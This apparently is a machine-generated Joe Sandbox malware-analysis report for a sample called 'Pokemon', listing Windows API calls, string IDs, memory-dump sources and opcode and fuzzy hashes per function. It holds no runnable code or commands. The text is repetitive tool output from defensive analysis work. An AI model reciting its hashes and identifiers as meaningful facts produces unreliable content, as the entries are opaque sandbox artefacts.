                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00091F87
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091F96
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: BeginPath.GDI32(?), ref: 00091FAD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00091F2D: SelectObject.GDI32(?,00000000), ref: 00091FD6
                                                                                                                                                                                                                                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001292E3
                                                                                                                                                                                                                                                                                      • LineTo.GDI32(?,?,?), ref: 001292F0
                                                                                                                                                                                                                                                                                      • EndPath.GDI32(?), ref: 00129300
                                                                                                                                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0012930E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 000921BC
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 000921C6
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 000921D9
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 000921E1
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000EEC36
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 000EEC40
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000EEC60
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 000EEC81
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000EEC4A
                                                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 000EEC54
                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000EEC60
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?), ref: 000EEC81
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fb6f9547597a285d69be04cbf172df3a3ad4111422d692c204f24fcaea2655b0
                                                                                                                                                                                                                                                                                      • Instruction ID: 38daf2a87772537a8e256e1e06848057f1c6034741e610ed4c7124bd8b8708ad
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb6f9547597a285d69be04cbf172df3a3ad4111422d692c204f24fcaea2655b0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85E04F70C00204EFCF609FA0E808A5DBBB5FB08310F108419F809E3650C73C5952DF44
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00105919
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                      • String ID: *$LPT
                                                                                                                                                                                                                                                                                      • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                      • Opcode ID: 2366b9de8023e194deaf364cda4bd1958279644e20ab81ae93b5271d213158df
                                                                                                                                                                                                                                                                                      • Instruction ID: d61ebe9645db6df57764a3f68a4fd076da3b0682a1c890ad20e06128cf56205a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2366b9de8023e194deaf364cda4bd1958279644e20ab81ae93b5271d213158df
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF915075A00604DFDB14DF54C494EAABBF2AF44314F198099E8899F392C7B1EE85CF50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 000BE67D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                      • Opcode ID: db111e07f4fe1abcb6247b52aa652b1d6a6004325321cdd58ce532c89798eebf
                                                                                                                                                                                                                                                                                      • Instruction ID: 00863639fa95f9ad0350653ad1f7127f9ad1c48e48cb839e08f37a729504303c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db111e07f4fe1abcb6247b52aa652b1d6a6004325321cdd58ce532c89798eebf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7516D61E0C14196C7657B14CD01BEE2BE8AB50790F34CD6CF891822E9EF358DD59B4E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                      • Opcode ID: 6cbde9e19361b95cad274456d7906c51d4a6c71fad1b9f5e0880731b707db6ee
                                                                                                                                                                                                                                                                                      • Instruction ID: 447bdb6d1f8cf320a1befe268e12a38a0026ed166c21ebebc134c8d48ad31920
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cbde9e19361b95cad274456d7906c51d4a6c71fad1b9f5e0880731b707db6ee
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B5132716052869FCF25DF69C441AFE7BE0EF16310F648059F895AB2D1DB309E82CB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 000AF6DB
                                                                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 000AF6F4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: b44bdd67fb767806ecaa80becc1f9b199cd056e13bd8c38d0032fc9d77f85156
                                                                                                                                                                                                                                                                                      • Instruction ID: 78a5c233bf52c85201901833c2a2686c8dfb1bfaea540185259b1a63d645aec1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b44bdd67fb767806ecaa80becc1f9b199cd056e13bd8c38d0032fc9d77f85156
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2513A714087449BE720AF10DC85BABB7E8FB85304F81885DF1D9521A6EB308969C766
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                      • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                      • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                      • Opcode ID: 7fc4dad8a14805ba9899066785736134b3e17fa40d283c745110d88c9d3e21aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 7af2293defad0eb3ddea59c6155d3562ac2250c4c8124395253b57f9ec45ad41
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fc4dad8a14805ba9899066785736134b3e17fa40d283c745110d88c9d3e21aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48419F71E002199FCF08DFA8C8859FEBBB5FF69364F104169E506A7252E7729D81CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0010DB75
                                                                                                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0010DB7F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                                                                      • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                      • Opcode ID: 8659470a458ea727a02a112165b70949bca504016e231b5a8e48ab4209d68045
                                                                                                                                                                                                                                                                                      • Instruction ID: b96d02b90f76daca641ee0ed1ecba59313f76ee9a426fad7ce18bdd4f78b542d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8659470a458ea727a02a112165b70949bca504016e231b5a8e48ab4209d68045
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6317C71C01109ABDF15EFA0DD85EEEBFB9FF05304F104029F815A62A2EB719A16DB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 001240BD
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001240F8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                      • Opcode ID: e4d3896d9209790a22af1e1be3abbdb28d56427803fafd60f836fce81d022058
                                                                                                                                                                                                                                                                                      • Instruction ID: 101651bc4a678571876195dd95f6ee13d333f38916649158eafbd3ad08a357bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4d3896d9209790a22af1e1be3abbdb28d56427803fafd60f836fce81d022058
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4331BE71110614ABDB24CF68DC80AFB73A9FF48720F008619F9A987190CB70ACA1DB64
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001250BD
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001250D2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d8a5e5b6db879adc75583d1115aa3ae28de18f0b6598b9b018ef3e8247e47fc
                                                                                                                                                                                                                                                                                      • Instruction ID: 556a1fdb8acc4d9325e7d01eeaa7376835c1e45e035289c3c79de89e1774f298
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d8a5e5b6db879adc75583d1115aa3ae28de18f0b6598b9b018ef3e8247e47fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24316B74A0071A9FDB14CF69D880BDE7BB6FF49300F10406AE904AB391D771A951CF94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000978B1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: GetStockObject.GDI32(00000011), ref: 000978C5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000978CF
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00124216
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00124230
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                      • Opcode ID: cda715ee11d275dce96a7e52811c752f8f8e7451c46a3ee52f85a710af7aba1f
                                                                                                                                                                                                                                                                                      • Instruction ID: 78264035fd6961004d5dcf73dd5f4045ffe4959e99699d08488fbda3efb6f9b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cda715ee11d275dce96a7e52811c752f8f8e7451c46a3ee52f85a710af7aba1f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06112372610219AFDB00DFA9EC45AEA7BF8EB08314F015928F955E3250E774E861AB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0010D7C2
                                                                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0010D7EB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                      • Opcode ID: 39c79be90486da146318bdceab218880822bf0ae1a94d8f76f4e896cf294c577
                                                                                                                                                                                                                                                                                      • Instruction ID: cc32aac7b62ef55dcb5cae6c70c0f9d2d9d06948e8ec117427f723bbe1a24145
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c79be90486da146318bdceab218880822bf0ae1a94d8f76f4e896cf294c577
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2112971141232B9D7384BA2AC45EF7BE5CEB127ACF00422AF589830C0D3A48840C2F0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 000F761D
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F7629
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: STOP
                                                                                                                                                                                                                                                                                      • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                      • Opcode ID: dbce29acf8c2554941032e9e9b25282ea0a8640f1040e1c297da7945a24c204b
                                                                                                                                                                                                                                                                                      • Instruction ID: 53c0dcc219d22ce89940b03a361afcfa7d5548943afd675bee6da2f50d8ea1c8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbce29acf8c2554941032e9e9b25282ea0a8640f1040e1c297da7945a24c204b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0010032A0892A8BCB60AFBCDC408BF33F5AB607547400524E929D7692EB30D900E281
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000F2699
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 2f5981b14adc98e3b7ea8433d6832f06a5467d524333addd362330d0cdf98845
                                                                                                                                                                                                                                                                                      • Instruction ID: 93f41eeeee0f3e7a2819a93a20f727ccbcee47fc2d67e7189c029228196d467e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f5981b14adc98e3b7ea8433d6832f06a5467d524333addd362330d0cdf98845
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7001D475A01218ABCF04EBA4DC55CFE77A8EF46760B400619B932A76C2EB35590CEA90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 000F2593
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
